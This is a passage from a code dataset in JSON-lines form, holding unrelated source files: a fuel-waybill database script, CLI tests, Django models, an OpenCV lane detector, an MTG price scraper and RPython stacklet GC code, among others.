TimeoutError:\n print(f'Таймаут {username, url}')\n\n\nasync def main():\n\n start = time.time()\n\n table_column = 'date_upload, okrug_name, company_name, gov_number, fact_fuel_end, sensor_finish_value, difference, status, date, level_sensors_num, gps_code, status_diff'\n users = await data_get('*', 'ets_users', '', settings.DB_SCRIPTS, 'scripts', settings.DB_ACCESS)\n for user in users:\n username = user[1]\n password = user[2]\n tokens[username] = await token_get(username, password)\n await car_action(username, tokens[username])\n\n async with aiohttp.ClientSession() as session:\n tasks = []\n for username in data_cars:\n for car in data_cars[username]:\n tasks.append(asyncio.ensure_future(get_waybill_data(username, tokens[username], session, car[0], car[5], car[6], car[2])))\n waybills_data = await asyncio.gather(*tasks)\n for x in waybills_data:\n if x:\n fuel_end = (0 if x['equipment_fact_fuel_end'] is None else x['equipment_fact_fuel_end']) + x['fact_fuel_end']\n sensor_value = 0 if x['sensor_finish_value'] is None else x['sensor_finish_value']\n result_fuel = round(fuel_end - sensor_value, 2)\n data.append((datetime.now().date().strftime('%Y-%m-%d'),\n x['okrug_name'],\n x['company_name'],\n x['gov_number'],\n fuel_end,\n 0 if x['sensor_finish_value'] is None else x['sensor_finish_value'],\n result_fuel,\n \"ДУТ не работает\" if x['sensor_finish_value'] == '0' else 'ДУТ работает',\n x['closing_date'],\n x['level_sensors_num'],\n 'Нет БНСО' if x['gps_code'] is None else x['gps_code'],\n \"Остаток\" if result_fuel > 0 else \"Норма\"))\n\n params = 'where extract(day from (current_timestamp::timestamp without time zone - date_upload::timestamp without time zone)) > 7 OR extract(day from (current_timestamp::timestamp without time zone - date_upload::timestamp without time zone)) = 0'\n await data_delete('deficit_fuel', params, settings.DB_SCRIPTS, 'scripts', settings.DB_ACCESS)\n await data_post(data, 'deficit_fuel', table_column, settings.DB_SCRIPTS, 'scripts', settings.DB_ACCESS)\n\n print(time.strftime(\"%H:%M:%S\", time.gmtime(time.time() - start)))\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"Maxtremality/govScripts","sub_path":"deficit_fuel.py","file_name":"deficit_fuel.py","file_ext":"py","file_size_in_byte":4693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"20243260946","text":"import os\nimport shutil\nimport tempfile\nfrom pathlib import Path\nfrom subprocess import check_output\nfrom unittest import TestCase, skipIf\n\nfrom openmapflow.constants import VERSION\n\n\nclass TestCLI(TestCase):\n \"\"\"\n openmapflow must be installed for these tests to run\n \"\"\"\n\n @skipIf(os.name == \"nt\", \"Not yet available on Windows\")\n def test_cp(self):\n tmpdir = tempfile.mkdtemp()\n p = Path(tmpdir) / \"Dockerfile\"\n self.assertFalse(p.exists())\n check_output(\n [\"openmapflow\", \"cp\", \"Dockerfile\", f\"{tmpdir}\"], cwd=tmpdir\n ).decode()\n self.assertTrue(p.exists())\n shutil.rmtree(tmpdir)\n\n @skipIf(os.name == \"nt\", \"Not yet available on Windows\")\n def test_dir(self):\n output = check_output([\"openmapflow\", \"dir\"]).decode().rstrip()\n self.assertTrue(output.endswith(\"openmapflow\"))\n\n @skipIf(os.name == \"nt\", \"Not yet available on Windows\")\n def test_ls(self):\n output = check_output([\"openmapflow\", \"ls\"]).decode().rstrip()\n self.assertIn(\"Dockerfile\", output)\n self.assertIn(\"__init__.py\", output)\n self.assertIn(\"config.py\", output)\n self.assertIn(\"constants.py\", output)\n self.assertIn(\"generate.py\", output)\n self.assertIn(\"inference_utils.py\", output)\n self.assertIn(\"inference_widgets.py\", output)\n self.assertIn(\"labeled_dataset.py\", output)\n self.assertIn(\"notebooks\", output)\n self.assertIn(\"pytorch_dataset.py\", output)\n self.assertIn(\"scripts\", output)\n self.assertIn(\"templates\", output)\n self.assertIn(\"train_utils.py\", output)\n self.assertIn(\"trigger_inference_function\", output)\n self.assertIn(\"utils.py\", output)\n\n @skipIf(os.name == \"nt\", \"Not yet available on Windows\")\n def test_version(self):\n self.assertEqual(\n check_output([\"openmapflow\", \"version\"]).decode().rstrip(), VERSION\n )\n self.assertEqual(\n check_output([\"openmapflow\", \"--version\"]).decode().rstrip(), VERSION\n )\n\n @skipIf(os.name == \"nt\", \"Not yet available on Windows\")\n def test_help(self):\n self.maxDiff = None\n actual_output = check_output([\"openmapflow\", \"help\"]).decode().rstrip()\n long_line = \"-\" * 93\n expected_output = f\"\"\"{long_line}\n OpenMapFlow CLI\\n{long_line}\nopenmapflow cp - copy a file or directory from the library\nopenmapflow create-datasets - creates datasets for all datasets in datasets.py\nopenmapflow datapath - outputs a relative path to the data directory\nopenmapflow datasets - outputs a list of all datasets\nopenmapflow deploy - deploys Google Cloud Architecture for project\nopenmapflow dir - outputs openmapflow library directory\nopenmapflow generate - generates an openmapflow project\nopenmapflow help - outputs this message\nopenmapflow ls - lists files in openmapflow library directory\nopenmapflow verify - verifies a user declared LabeledDataset class in datasets.py\nopenmapflow version - package version\"\"\"\n self.assertEqual(actual_output, expected_output)\n","repo_name":"nasaharvest/openmapflow","sub_path":"tests/test_CLI.py","file_name":"test_CLI.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"83"} +{"seq_id":"17410997694","text":"import numpy as np\nimport tensorflow as tf\n\nTRAINING_DATA = 'iris_training.csv'\nTEST_DATA = 'iris_test.csv'\n\n\ndef main():\n feature_columns = [tf.contrib.layers.real_valued_column(\"\", dimension=1)]\n\n training_set = tf.contrib.learn.datasets.base.load_csv_with_header(filename=TRAINING_DATA, target_dtype=np.int,\n features_dtype=np.float32)\n test_set = tf.contrib.learn.datasets.base.load_csv_with_header(filename=TEST_DATA, target_dtype=np.int,\n features_dtype=np.float32)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"lpj0017/XiaoLuAI","sub_path":"test/tflearn/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"8657022071","text":"from django.contrib.auth.models import User\nfrom django.db import models\n\n# Create your models here.\n\nfrom utils.helpers import file_upload_directory\n\n\nclass UserTypeChoice(models.TextChoices):\n TEACHER = 'TEACHER'\n STUDENT = 'STUDENT'\n ADMIN = 'ADMIN'\n PLAYER = 'PLAYER'\n\n\nclass GenderChoice(models.TextChoices):\n MALE = 'MALE'\n FEMALE = 'FEMALE'\n OTHERS = 'OTHERS'\n\n\nclass Profile(models.Model):\n user = models.OneToOneField('auth.User', on_delete=models.CASCADE)\n image = models.ImageField(upload_to=file_upload_directory, null=True, blank=True)\n\n gender = models.CharField(max_length=10, choices=GenderChoice.choices, default=GenderChoice.MALE)\n user_type = models.CharField(max_length=100, choices=UserTypeChoice.choices, default=UserTypeChoice.STUDENT)\n phone_number = models.CharField(max_length=11, null=True, blank=True)\n address = models.TextField(null=True, blank=True)\n\n def __str__(self):\n return self.user.first_name + ' ' + self.user.last_name\n\n def department(self):\n if self.user_type == UserTypeChoice.STUDENT:\n return self.student.department.name\n elif self.user_type == UserTypeChoice.TEACHER:\n return self.teacher.department.name\n","repo_name":"Himel-b11/sports_django","sub_path":"user_profile/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"42037207860","text":"# Unit 60\n# a = []\n# dir(a) shows the list of all functions\n\n# while True:\n# words = input(\"Say something: \")\n# a.append(words)\n# if \"\\end\" in a:\n# a.remove(\"\\end\")\n# print(*a, sep='. ')\n# break\n\n\ndef sentence_maker(phrase):\n interrogatives =(\"how\", \"what\", \"why\")\n capitalitzed = phrase.capitalize()\n if phrase.startswith(interrogatives):\n return \"{}?\".format(capitalitzed)\n else:\n return \"{}\".format(capitalitzed)\n\n\n# print(sentence_maker(\"how are you\"))\n\nresults = []\nwhile True:\n user_input = input(\"Say something: \")\n if user_input == \"\\end\":\n break\n else:\n results.append(sentence_maker(user_input))\n\nprint(\" \".join(results))","repo_name":"jhkoh17/python_basic","sub_path":"section8.py","file_name":"section8.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"74335851472","text":"import wx\nclass LinkUI(wx.Dialog):\n\tdef __init__(self, parent, url):\n\t\tself.parent=parent\n\t\twx.Dialog.__init__(self, parent, title=\"URL Ready\", size=wx.DefaultSize) # initialize the wx frame\n\t\tself.panel = wx.Panel(self)\n\t\tself.main_box = wx.BoxSizer(wx.VERTICAL)\n\t\tself.Bind(wx.EVT_CLOSE, self.OnClose)\n\t\tself.link_label = wx.StaticText(self.panel, -1, \"Audio &link\")\n\t\tself.link = wx.TextCtrl(self.panel, -1, \"\",style=wx.TE_READONLY)\n\t\tself.link.SetValue(url)\n\t\tself.main_box.Add(self.link, 0, wx.ALL, 10)\n\t\tself.link.SetFocus()\n\t\tself.close = wx.Button(self.panel, wx.ID_CANCEL, \"&Cancel\")\n\t\tself.close.Bind(wx.EVT_BUTTON, self.OnClose)\n\t\tself.main_box.Add(self.close, 0, wx.ALL, 10)\n\t\tself.panel.Layout()\n\t\n\tdef OnClose(self, event):\n#\t\tself.parent.Raise()\n#\t\tself.parent.SetFocus()\n\t\tself.Destroy()\n\ndef ShowLink(parent,url):\n\tlink = LinkUI(parent,url)\n\treturn link.ShowModal()","repo_name":"Brynify/uploader","sub_path":"LinkUI.py","file_name":"LinkUI.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"36121125747","text":"#!/usr/bin/python\nimport requests\n\ndef get_reviews(dict):\n\tres = requests.get('http://gen-review.net/api/v1.0/get_reviews',json=dict)\n\tif res.ok:\n\t\treturn (res.json())\n\ndef progress(task_id):\n\tres = requests.get('http://80.249.144.13:5000/api/v1.0/progress/'+task_id)\n\tif res.ok:\n\t\treturn (res.json())\n\ndef post_id(dict):\n\tres = requests.post('http://80.249.144.13:5000/api/v1.0/gen', json=dict)\n\tif res.ok:\n\t\treturn (res.json())\t\n\ndef request_file_id(dict):\n\tres = requests.get('http://80.249.144.13:5000/api/v1.0/request_file_id', json=dict)\n\tif res.ok:\n\t\treturn (res.json())\t\n\n\ndef similar(dict):\n\tres = requests.get('http://80.249.144.13:5000/api/v1.0/similar_apps_count',json=dict)\n\tif res.ok:\n\t\treturn (res.json())\t\n\nif __name__ == \"__main__\":\n\tdict = {'user_id':'user2',\n\t\t\t'target_id': 'com.AndreyMelnikov.DroneRacingSimulator',\n\t\t\t'lang':'en_US',\n\t\t\t'reviews_amount': 200,\n\t\t\t'length': \"Short\",\n\t\t\t'file_id':'user2 123',\n\t\t\t'ratings':1,\n\t\t\t'similar_ids':['com.AndreyMelnikov.DRS','com.Freeride.Freerider']}\n\t#print(request_file_id({'user_id': 'user2'}))\n\tprint(post_id(dict))\n\t#print(get_reviews({'file_id':'user2 2020-02-27 22:53:44.456785', 'ratings':\"1\"}))\n\t#print(progress(\"f635e99d-7737-4498-b9ec-501316093de3\"))\n\t#print(similar({'target_id':'com.AndreyMelnikov.DroneRacingSimulator'}))","repo_name":"andrey-melnikov/gen_review","sub_path":"ClientEmulator.py","file_name":"ClientEmulator.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"8935469431","text":"import matplotlib.pylab as plt\r\nimport cv2\r\nimport numpy as np\r\n\r\n# we have to mask the rest lines(lets make a function for that)\r\ndef region_of_interest(img, vertices):\r\n mask = np.zeros_like(img) # blank mask(matrix)\r\n #channel_count = img.shape[2] #number of color channels\r\n match_mask_color = 255 # create a match color with same channel count\r\n cv2.fillPoly(mask, vertices, match_mask_color) # fill polygons to mask all other lines\r\n masked_image = cv2.bitwise_and(img, mask) # to take only the matching pixels\r\n return masked_image\r\n\r\n# function to draw the line\r\ndef draw_lines(img, lines):\r\n img = np.copy(img)\r\n blank_image = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8) #blank img with same dimmension\r\n for line in lines:\r\n for x1, y1, x2, y2 in line: # loop through lines\r\n cv2.line(blank_image, (x1,y1), (x2,y2), (0, 255, 0),thickness=10) # draw line\r\n img = cv2.addWeighted(img, 0.8, blank_image, 1, 0.0)\r\n return img\r\n\r\nimage = cv2.imread('road.jpg') # read the image\r\nimage = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) #convert the image to rgb format\r\n\r\nprint(image.shape)\r\nheight = image.shape[0]\r\nwidth = image.shape[1]\r\n\r\n# Define Region of Tntereset\r\n# the lane we are in has 2 paralal line merging at one point (a triangle)\r\nregion_of_interest_vertices = [\r\n (0, height),\r\n (width/2, height/2),\r\n (width, height)\r\n]\r\n\r\n# we need to take the grayscale image\r\ngray_image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\r\n# to detect the edge we will do canny edge detection\r\ncanny_image = cv2.Canny(gray_image, 100, 200)\r\n# do region of interest again in canny image\r\ncropped_image = region_of_interest(canny_image,\r\n np.array([region_of_interest_vertices], np.int32),)\r\n\r\n# to draw the line in these edges using hough lines\r\nlines = cv2.HoughLinesP(cropped_image,\r\n rho=6,\r\n theta=np.pi/180,\r\n threshold=160,\r\n lines=np.array([]),\r\n minLineLength=40,\r\n maxLineGap=25)\r\n\r\nimage_with_lines = draw_lines(image, lines)\r\n\r\nplt.imshow(image_with_lines)\r\nplt.show()","repo_name":"TridibD004/Road-Lane-Detection","sub_path":"detector_image2.py","file_name":"detector_image2.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"22210891126","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution(object):\n def swapNodes(self, head, k):\n \"\"\"\n :type head: ListNode\n :type k: int\n :rtype: ListNode\n \"\"\"\n first = head\n fast = head\n for _ in range(k - 1):\n first = first.next\n fast = fast.next\n second = head\n while fast.next:\n fast = fast.next\n second = second.next\n first.val, second.val = second.val, first.val\n return head\n ","repo_name":"KrushnaSonwane/LeetCode-Solutions","sub_path":"1721-swapping-nodes-in-a-linked-list/1721-swapping-nodes-in-a-linked-list.py","file_name":"1721-swapping-nodes-in-a-linked-list.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"1734858514","text":"# Import the necessary libraries\nimport requests # library for making HTTP requests\nimport json # library for working with JSON data\nimport re # library for working with regular expressions\nfrom datetime import datetime # library for working with dates and times\nimport csv # library for working with CSV files\nimport os # library for working with the operating system\nimport pandas as pd # library for data manipulation and analysis\n\n# Prompt the user to choose between \"sealed\", \"sets\", or \"prints\"\nchoice = input(\"Enter your choice (sealed/sets/prints): \")\n\ndef csv_write(card,date,file):\n \"\"\"\n Write card data to a CSV file\n \"\"\"\n # Check if the file exists and is empty\n prewrite = False\n try:\n if os.stat(\"%s.csv\"%file).st_size == 0:\n prewrite=True\n except OSError:\n prewrite=True\n \n # If the file is empty or does not exist, add the headers to the CSV file\n if(prewrite):\n with open(\"%s.csv\"%file,\"a\") as f:\n writer = csv.writer(f)\n writer.writerow([\"name\", \"date\", \"rarity\", \"avg_price\", \"foil\", \"market\", \"market_foil\"])\n\n # Extract relevant data from the card dictionary\n name = card[\"name\"]\n avg_price = card[\"latest_price\"][\"avg\"]\n foil = card[\"latest_price\"][\"foil\"]\n market = card[\"latest_price\"][\"market\"]\n market_foil = card[\"latest_price\"][\"market_foil\"]\n rarity = card[\"rarity\"]\n row = [name, date, rarity, \"$%s\"%avg_price, \"$%s\"%foil, \"$%s\"%market, \"$%s\"%market_foil]\n\n # Write the row to the CSV file\n with open(\"%s.csv\"%file,\"a\") as f:\n writer = csv.writer(f)\n writer.writerow(row)\n\n\n# Define the API endpoint URL based on the user's choice\nif choice == \"sealed\":\n url = \"https://api.mtgstocks.com/sealed\"\nelif choice == \"sets\":\n url = \"https://api.mtgstocks.com/card_sets\"\nelif choice == \"prints\":\n url = \"https://api.mtgstocks.com/prints\"\nelse:\n print(\"Invalid choice.\")\n exit()\n\n# Prompt the user to enter a new number\nnumber = input(\"Enter a number: \")\n\n# Add the number to the URL\nurl += f\"/{number}\"\n\n# Define the headers for the request\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36\"\n}\n\n# Make an HTTP GET request to the endpoint with the headers\nresponse = requests.get(url, headers=headers)\n\n# Check if the request was successful (status code 200 indicates success)\nif response.status_code == 200:\n\n # Retrieve the data from the response as a JSON object\n data = response.json()\n\n # Create a new dictionary with only the desired key-value pairs\n if choice == \"sealed\":\n new_data = {\n \"Name\": data[\"name\"],\n \"Latest Prices\": data[\"latestPrice\"]\n }\n elif choice == \"sets\":\n new_data = {\n \"Name\": data[\"name\"],\n #\"In The Set\": data[\"prints\"]\n }\n # Iterate over each card in the \"prints\" section of the JSON data and write its information to a CSV file\n for card in data[\"prints\"]:\n # Call the csv_write function to write the card's information to the CSV file\n # Also pass the date and slug information to the function\n csv_write(card, datetime.utcfromtimestamp(data[\"date\"]/1000).strftime('%Y-%m-%d'), data[\"slug\"])\n\n # Read the CSV file for the specified slug using pandas and store the data in a DataFrame object\n df = pd.read_csv(f\"{data['slug']}.csv\")\n\n # Write the DataFrame object to an Excel file with the same slug name\n writer = pd.ExcelWriter(f\"{data['slug']}.xlsx\")\n df.to_excel(writer, index=False)\n writer._save()\n\n# If the user selected \"prints\" as the choice\n elif choice == \"prints\":\n # Convert the Unix timestamp for the latest price to a human-readable date and time format\n data[\"latest_price\"][\"date\"] = datetime.utcfromtimestamp(data[\"latest_price\"][\"date\"]/1000).strftime('%Y-%m-%d %H:%M:%S')\n # Create a new dictionary containing the name and latest price information for the card\n new_data = {\n \"Name\": data[\"name\"],\n \"Prices\": data[\"latest_price\"]\n }\n # Convert the new dictionary to a JSON string with an indent of 2\n json_string = json.dumps(new_data, indent=2)\n # Remove the curly braces from the string using regex\n json_string = re.sub(r\"[{}]\", \"\", json_string)\n # Print the modified JSON string to the console\n print(json_string)\n\n# If the request was not successful, print the HTTP status code\nelse:\n print(f\"Error: {response.status_code}\")\n\n\n","repo_name":"KDenston61/MTGStocks-Scraper","sub_path":"Scraper.py","file_name":"Scraper.py","file_ext":"py","file_size_in_byte":4610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27592416267","text":"from rpython.rlib.debug import ll_assert\nfrom rpython.rlib import rgc\nfrom rpython.rlib.objectmodel import specialize\nfrom rpython.rtyper.lltypesystem import lltype, llmemory, rffi\nfrom rpython.rtyper.lltypesystem.lloperation import llop\nfrom rpython.rtyper.annlowlevel import llhelper, MixLevelHelperAnnotator\nfrom rpython.annotator import model as annmodel\nfrom rpython.rtyper.llannotation import lltype_to_annotation\nfrom rpython.rlib import _rffi_stacklet as _c\n\n\n_asmstackrootwalker = None # BIG HACK: monkey-patched by asmgcroot.py\n_stackletrootwalker = None\n\ndef get_stackletrootwalker():\n # XXX this is too complicated now; we don't need a StackletRootWalker\n # instance to store global state. We could rewrite it all in one big\n # function. We don't care enough for now.\n\n # lazily called, to make the following imports lazy\n global _stackletrootwalker\n if _stackletrootwalker is not None:\n return _stackletrootwalker\n\n from rpython.memory.gctransform.asmgcroot import (\n WALKFRAME, CALLEE_SAVED_REGS, INDEX_OF_EBP, sizeofaddr)\n\n assert _asmstackrootwalker is not None, \"should have been monkey-patched\"\n basewalker = _asmstackrootwalker\n\n class StackletRootWalker(object):\n _alloc_flavor_ = \"raw\"\n\n def setup(self, obj):\n # initialization: read the SUSPSTACK object\n p = llmemory.cast_adr_to_ptr(obj, lltype.Ptr(SUSPSTACK))\n if not p.handle:\n return False\n self.context = llmemory.cast_ptr_to_adr(p.handle)\n self.next_callback_piece = p.callback_pieces\n anchor = p.anchor\n del p\n self.curframe = lltype.malloc(WALKFRAME, flavor='raw')\n self.otherframe = lltype.malloc(WALKFRAME, flavor='raw')\n self.fill_initial_frame(self.curframe, anchor)\n return True\n\n def fill_initial_frame(self, curframe, initialframedata):\n # Copy&paste :-(\n initialframedata += 2*sizeofaddr\n reg = 0\n while reg < CALLEE_SAVED_REGS:\n curframe.regs_stored_at[reg] = initialframedata+reg*sizeofaddr\n reg += 1\n retaddraddr = initialframedata + CALLEE_SAVED_REGS * sizeofaddr\n retaddraddr = self.translateptr(retaddraddr)\n curframe.frame_address = retaddraddr.address[0]\n\n def fetch_next_stack_piece(self):\n if self.next_callback_piece == llmemory.NULL:\n lltype.free(self.curframe, flavor='raw')\n lltype.free(self.otherframe, flavor='raw')\n self.context = llmemory.NULL\n return False\n else:\n anchor = self.next_callback_piece\n nextaddr = anchor + sizeofaddr\n nextaddr = self.translateptr(nextaddr)\n self.next_callback_piece = nextaddr.address[0]\n self.fill_initial_frame(self.curframe, anchor)\n return True\n\n @specialize.arg(3)\n def customtrace(self, gc, obj, callback, arg):\n #\n # Pointers to the stack can be \"translated\" or not:\n #\n # * Non-translated pointers point to where the data would be\n # if the stack was installed and running.\n #\n # * Translated pointers correspond to where the data\n # is now really in memory.\n #\n # Note that 'curframe' contains non-translated pointers, and\n # of course the stack itself is full of non-translated pointers.\n #\n if not self.setup(obj):\n return\n\n while True:\n callee = self.curframe\n retaddraddr = self.translateptr(callee.frame_address)\n retaddr = retaddraddr.address[0]\n ebp_in_caller = callee.regs_stored_at[INDEX_OF_EBP]\n ebp_in_caller = self.translateptr(ebp_in_caller)\n ebp_in_caller = ebp_in_caller.address[0]\n basewalker.locate_caller_based_on_retaddr(retaddr,\n ebp_in_caller)\n\n # see asmgcroot for similarity:\n while True:\n location = basewalker._shape_decompressor.next()\n if location == 0:\n break\n addr = basewalker.getlocation(callee, ebp_in_caller,\n location)\n # yield the translated addr of the next GCREF in the stack\n addr = self.translateptr(addr)\n gc._trace_callback(callback, arg, addr)\n\n caller = self.otherframe\n reg = CALLEE_SAVED_REGS - 1\n while reg >= 0:\n location = basewalker._shape_decompressor.next()\n addr = basewalker.getlocation(callee, ebp_in_caller,\n location)\n caller.regs_stored_at[reg] = addr # non-translated\n reg -= 1\n\n location = basewalker._shape_decompressor.next()\n caller.frame_address = basewalker.getlocation(callee,\n ebp_in_caller,\n location)\n # ^^^ non-translated\n if caller.frame_address == llmemory.NULL:\n # completely done with this piece of stack\n if not self.fetch_next_stack_piece():\n return\n continue\n #\n self.otherframe = callee\n self.curframe = caller\n # loop back\n\n def translateptr(self, addr):\n return _c._translate_pointer(self.context, addr)\n\n _stackletrootwalker = StackletRootWalker()\n return _stackletrootwalker\nget_stackletrootwalker._annspecialcase_ = 'specialize:memo'\n\ndef complete_destrptr(gctransformer):\n translator = gctransformer.translator\n mixlevelannotator = MixLevelHelperAnnotator(translator.rtyper)\n args_s = [lltype_to_annotation(lltype.Ptr(SUSPSTACK))]\n s_result = annmodel.s_None\n destrptr = mixlevelannotator.delayedfunction(suspstack_destructor,\n args_s, s_result)\n mixlevelannotator.finish()\n lltype.attachRuntimeTypeInfo(SUSPSTACK, destrptr=destrptr)\n\n\ndef customtrace(gc, obj, callback, arg):\n stackletrootwalker = get_stackletrootwalker()\n stackletrootwalker.customtrace(gc, obj, callback, arg)\nlambda_customtrace = lambda: customtrace\n\ndef suspstack_destructor(suspstack):\n h = suspstack.handle\n if h:\n _c.destroy(h)\n\n\nSUSPSTACK = lltype.GcStruct('SuspStack',\n ('handle', _c.handle),\n ('anchor', llmemory.Address),\n ('callback_pieces', llmemory.Address),\n rtti=True)\nNULL_SUSPSTACK = lltype.nullptr(SUSPSTACK)\n\nASM_FRAMEDATA_HEAD_PTR = lltype.Ptr(lltype.ForwardReference())\nASM_FRAMEDATA_HEAD_PTR.TO.become(lltype.Struct('ASM_FRAMEDATA_HEAD',\n ('prev', ASM_FRAMEDATA_HEAD_PTR),\n ('next', ASM_FRAMEDATA_HEAD_PTR)\n ))\nalternateanchor = lltype.malloc(ASM_FRAMEDATA_HEAD_PTR.TO,\n immortal=True)\nalternateanchor.prev = alternateanchor\nalternateanchor.next = alternateanchor\n\nFUNCNOARG_P = lltype.Ptr(lltype.FuncType([], _c.handle))\npypy_asm_stackwalk2 = rffi.llexternal('pypy_asm_stackwalk',\n [FUNCNOARG_P,\n ASM_FRAMEDATA_HEAD_PTR],\n lltype.Signed, sandboxsafe=True,\n _nowrapper=True)\n\n\ndef _new_callback():\n # Here, we just closed the stack. Get the stack anchor, store\n # it in the gcrootfinder.suspstack.anchor, and create a new\n # stacklet with stacklet_new(). If this call fails, then we\n # are just returning NULL.\n _stack_just_closed()\n #\n return _c.new(gcrootfinder.newthrd, llhelper(_c.run_fn, _new_runfn),\n llmemory.NULL)\n\ndef _stack_just_closed():\n # Immediately unlink the new stackanchor from the doubly-linked\n # chained list. When returning from pypy_asm_stackwalk2, the\n # assembler code will try to unlink it again, which should be\n # a no-op given that the doubly-linked list is empty.\n stackanchor = llmemory.cast_ptr_to_adr(alternateanchor.next)\n gcrootfinder.suspstack.anchor = stackanchor\n alternateanchor.prev = alternateanchor\n alternateanchor.next = alternateanchor\n\ndef _new_runfn(h, _):\n # Here, we are in a fresh new stacklet.\n llop.gc_stack_bottom(lltype.Void) # marker for trackgcroot.py\n #\n # There is a fresh suspstack object waiting on the gcrootfinder,\n # so populate it with data that represents the parent suspended\n # stacklet and detach the suspstack object from gcrootfinder.\n suspstack = gcrootfinder.attach_handle_on_suspstack(h)\n #\n # Call the main function provided by the (RPython) user.\n suspstack = gcrootfinder.runfn(suspstack, gcrootfinder.arg)\n #\n # Here, suspstack points to the target stacklet to which we want\n # to jump to next. Read the 'handle' and forget about the\n # suspstack object.\n return _consume_suspstack(suspstack)\n\ndef _consume_suspstack(suspstack):\n h = suspstack.handle\n ll_assert(bool(h), \"_consume_suspstack: null handle\")\n suspstack.handle = _c.null_handle\n return h\n\ndef _switch_callback():\n # Here, we just closed the stack. Get the stack anchor, store\n # it in the gcrootfinder.suspstack.anchor, and switch to this\n # suspstack with stacklet_switch(). If this call fails, then we\n # are just returning NULL.\n oldanchor = gcrootfinder.suspstack.anchor\n _stack_just_closed()\n h = _consume_suspstack(gcrootfinder.suspstack)\n #\n # gcrootfinder.suspstack.anchor is left with the anchor of the\n # previous place (i.e. before the call to switch()).\n h2 = _c.switch(h)\n #\n if not h2: # MemoryError: restore\n gcrootfinder.suspstack.anchor = oldanchor\n gcrootfinder.suspstack.handle = h\n return h2\n\n\nclass StackletGcRootFinder(object):\n suspstack = NULL_SUSPSTACK\n\n def new(self, thrd, callback, arg):\n self.newthrd = thrd._thrd\n self.runfn = callback\n self.arg = arg\n # make a fresh new clean SUSPSTACK\n rgc.register_custom_trace_hook(SUSPSTACK, lambda_customtrace)\n newsuspstack = lltype.malloc(SUSPSTACK)\n newsuspstack.handle = _c.null_handle\n self.suspstack = newsuspstack\n # Invoke '_new_callback' by closing the stack\n #\n callback_pieces = llop.gc_detach_callback_pieces(llmemory.Address)\n newsuspstack.callback_pieces = callback_pieces\n #\n h = pypy_asm_stackwalk2(llhelper(FUNCNOARG_P, _new_callback),\n alternateanchor)\n h = rffi.cast(_c.handle, h)\n #\n llop.gc_reattach_callback_pieces(lltype.Void, callback_pieces)\n return self.get_result_suspstack(h)\n\n def switch(self, suspstack):\n # Immediately before the switch, 'suspstack' describes the suspended\n # state of the *target* of the switch. Then it is theoretically\n # freed. In fact what occurs is that we reuse the same 'suspstack'\n # object in the target, just after the switch, to store the\n # description of where we came from. Then that \"other\" 'suspstack'\n # object is returned.\n self.suspstack = suspstack\n #\n callback_pieces = llop.gc_detach_callback_pieces(llmemory.Address)\n old_callback_pieces = suspstack.callback_pieces\n suspstack.callback_pieces = callback_pieces\n #\n h = pypy_asm_stackwalk2(llhelper(FUNCNOARG_P, _switch_callback),\n alternateanchor)\n h = rffi.cast(_c.handle, h)\n #\n llop.gc_reattach_callback_pieces(lltype.Void, callback_pieces)\n if not h:\n self.suspstack.callback_pieces = old_callback_pieces\n #\n return self.get_result_suspstack(h)\n\n def attach_handle_on_suspstack(self, handle):\n s = self.suspstack\n self.suspstack = NULL_SUSPSTACK\n ll_assert(bool(s.anchor), \"s.anchor should not be null\")\n s.handle = handle\n llop.gc_writebarrier(lltype.Void, llmemory.cast_ptr_to_adr(s))\n return s\n\n def get_result_suspstack(self, h):\n #\n # Return from a new() or a switch(): 'h' is a handle, possibly\n # an empty one, that says from where we switched to.\n if not h:\n raise MemoryError\n elif _c.is_empty_handle(h):\n return NULL_SUSPSTACK\n else:\n # This is a return that gave us a real handle. Store it.\n return self.attach_handle_on_suspstack(h)\n\n def is_empty_handle(self, suspstack):\n return not suspstack\n\n def get_null_handle(self):\n return NULL_SUSPSTACK\n\n\ngcrootfinder = StackletGcRootFinder()\n","repo_name":"mesalock-linux/mesapy","sub_path":"rpython/rlib/_stacklet_asmgcc.py","file_name":"_stacklet_asmgcc.py","file_ext":"py","file_size_in_byte":13217,"program_lang":"python","lang":"en","doc_type":"code","stars":371,"dataset":"github-code","pt":"83"} +{"seq_id":"37952916379","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport requests\nimport csv\nimport datetime\nimport os\n\ntry:\n URL = 'https://jsonbox.io/box_9da5210c1a35783aa3a7'\n\n try:\n response = requests.get(URL)\n json = response.json()\n except:\n raise Exception(\"Não foi possível obter os dados\")\n \n FILE_FOLDER = 'temp/'\n \n if os.path.isdir(FILE_FOLDER) == False:\n 